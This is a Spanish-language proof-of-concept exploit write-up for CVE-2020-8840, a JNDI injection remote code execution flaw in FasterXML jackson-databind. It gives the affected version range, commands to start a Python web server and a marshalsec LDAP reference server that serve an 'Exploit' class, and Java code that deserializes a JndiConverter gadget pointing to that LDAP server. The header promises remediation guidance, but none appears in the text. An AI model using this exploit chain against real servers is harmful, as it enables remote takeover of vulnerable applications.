
Exploit PoC para CVE-2020-8840: inyección JNDI que conduce a ejecución remota de código en FasterXML jackson-databind. Incluye configuración del entorno, cadena de explotación y guía de remediación.
jackson-databind es una biblioteca de procesamiento JSON perteneciente al grupo de proyectos FasterXML.
El 19 de febrero, NVD publicó un aviso de seguridad que revelaba la vulnerabilidad de ejecución remota de código en jackson-databind causada por inyección JNDI (CVE-2020-8840), con una puntuación CVSS de 9.8. Debido a que las versiones afectadas de jackson-databind carecen de ciertas clases de la lista negra xbean-reflect/JNDI, como org.apache.xbean.propertyeditor.JndiConverter, un atacante puede lograr la ejecución remota de código mediante inyección JNDI; si el ataque tiene éxito, se puede obtener el control del servidor (a nivel de servicio web).
2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2

Aquí se utiliza simplehttp para montar el servicio web.python -m SimpleHTTPServer 8080

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit


poc --> ldap --> http
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String args[]) {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/Exploit\"}]";
try {
mapper.readValue(json, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
